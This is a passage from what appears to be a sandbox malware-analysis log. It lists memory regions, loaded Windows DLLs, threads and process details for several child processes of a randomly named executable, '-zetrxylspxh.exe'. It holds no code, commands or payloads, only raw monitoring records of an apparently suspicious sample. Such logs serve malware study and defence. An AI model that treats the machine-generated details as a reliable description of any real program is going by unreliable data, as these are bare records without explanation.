"\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5423 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5424 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5425 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5426 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5427 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5428 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5429 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5430 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5431 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5432 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5433 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5646 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5647 start_va = 0x810000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 5648 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5649 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5650 start_va = 0x910000 end_va = 0xa97fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 5651 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 141 os_tid = 0xe84 Thread: id = 160 os_tid = 0xebc Thread: id = 192 os_tid = 0x10d0 Process: id = "49" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xce9b000" os_pid = "0x3ec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4892 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4893 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4894 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4895 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4896 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4897 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4898 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4899 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4900 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4901 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4902 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4903 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4904 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4905 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4906 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4907 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4916 start_va = 0x440000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4917 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4918 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4935 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4936 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4937 start_va = 0x610000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4938 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4939 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5461 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5462 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5463 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5464 start_va = 0x600000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5465 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5466 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5467 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5468 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 5469 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 5470 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5471 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5472 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5473 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5474 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5475 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5476 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5520 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5521 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5522 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5523 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5524 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5525 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5526 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5527 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5528 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5529 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5530 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5686 start_va = 0x540000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5687 start_va = 0x890000 end_va = 0x98ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 5688 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5689 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5690 start_va = 0x990000 end_va = 0xb17fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 5691 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 142 os_tid = 0x6f8 Thread: id = 199 os_tid = 0x11c8 Thread: id = 202 os_tid = 0xfec Process: id = "50" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x6998b000" os_pid = "0x12b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4919 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4920 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4921 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4922 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4923 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4924 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4925 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4926 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4927 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4928 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4929 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4930 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4931 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4932 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4933 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4934 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 5439 start_va = 0x440000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5440 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5441 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5442 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5443 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5444 start_va = 0x4d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 5445 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5446 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5447 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5448 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5449 start_va = 0x4d0000 end_va = 0x58dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5450 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5451 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5452 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5652 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5653 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5654 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 5655 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5656 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5657 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5658 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5659 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5660 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5661 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5662 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5663 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5664 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5665 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5666 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5667 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5668 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5669 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5795 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5796 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5797 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5798 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5799 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: 